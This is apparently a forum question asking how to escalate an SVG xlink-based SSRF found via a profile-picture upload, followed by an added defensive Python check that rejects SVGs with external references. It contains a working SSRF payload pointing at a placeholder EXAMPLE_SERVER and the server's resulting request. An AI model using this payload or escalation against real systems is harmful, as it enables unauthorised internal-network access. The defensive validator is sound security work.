
How to exploit SVG xlink-based SSRF

Çağlar Arlı


First, let me summarize how the SSRF works:

1) You set up an SVG image with a reference to your server via xlink. Here's an example that works:

<?xml version="1.0" encoding="UTF-8" standalone="no"?><svg xmlns:svg="http://www.w3.org/2000/svg" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="200" height="200"><image height="200" width="200" xlink:href="http://EXAMPLE_SERVER/" /></svg>

2) You upload the image as your profile picture

3) EXAMPLE_SERVER receives the following HTTP request from the server that the image is uploaded to:

GET / HTTP/1.0
Host: EXAMPLE_SERVER
Accept-Encoding: gzip

So all I have been able to confirm is that this is indeed SSRF, as the request is coming from the server, not from my client side. However, I'm not very skilled in this area, and I don't understand how to actually exploit this.

So how do I use this to enumerate files or perform any actions that will actually make it a valid vulnerability? I do believe an is-image-present oracle could be set up, but the server I am testing doesn’t have any images on it, so this wouldn’t be a problem.
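As an added, defensive example that is not part of the question: a Python check an upload handler could run before any server-side renderer touches a user-supplied SVG. It flags every href/xlink:href that is not a same-document fragment or an inline data: URI, so the image element above is rejected; the constructed sample reuses the page's EXAMPLE_SERVER placeholder.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

XLINK_NS = "http://www.w3.org/1999/xlink"
# Both spellings can make a server-side renderer fetch a resource: the SVG 1.1
# xlink:href used in the payload above and the SVG 2 plain href.
HREF_ATTRS = {"href": "href", f"{{{XLINK_NS}}}href": "xlink:href"}

def _is_local_ref(value: str) -> bool:
    """True only for same-document fragments (#id) and inline data: URIs."""
    value = value.strip()
    if value.startswith("#"):
        return True
    parts = urlsplit(value)
    # http:, https:, file:, ftp:, relative paths and protocol-relative //host/
    # URLs (empty scheme, non-empty netloc) all mean an external fetch.
    return parts.scheme.lower() == "data" and not parts.netloc

def find_external_refs(svg_bytes: bytes) -> list[str]:
    """Return 'tag@attr: value' for every reference that leaves the document."""
    # The stdlib expat parser does not resolve external entities, so parsing
    # the untrusted bytes here does not itself trigger a fetch.
    root = ET.fromstring(svg_bytes)
    findings = []
    for elem in root.iter():
        tag = elem.tag.rsplit("}", 1)[-1]  # strip the SVG namespace
        for attr, pretty in HREF_ATTRS.items():
            value = elem.attrib.get(attr)
            if value is not None and not _is_local_ref(value):
                findings.append(f"{tag}@{pretty}: {value.strip()}")
    return findings

def is_safe_svg_upload(svg_bytes: bytes) -> bool:
    """Reject anything that fails to parse or carries an external reference."""
    try:
        return not find_external_refs(svg_bytes)
    except ET.ParseError:
        return False

# Constructed sample: the payload from the question, EXAMPLE_SERVER kept as the placeholder.
SAMPLE_SVG = (
    b'<?xml version="1.0" encoding="UTF-8" standalone="no"?>'
    b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" '
    b'width="200" height="200">'
    b'<image height="200" width="200" xlink:href="http://EXAMPLE_SERVER/" /></svg>'
)

if __name__ == "__main__":
    for finding in find_external_refs(SAMPLE_SVG):
        print("rejecting upload:", finding)  # image@xlink:href: http://EXAMPLE_SERVER/
```

Rejecting the file at upload time is the cheap control; rasterizing accepted SVGs in a sandbox with no outbound network is the backstop for renderers that honour references this check does not model.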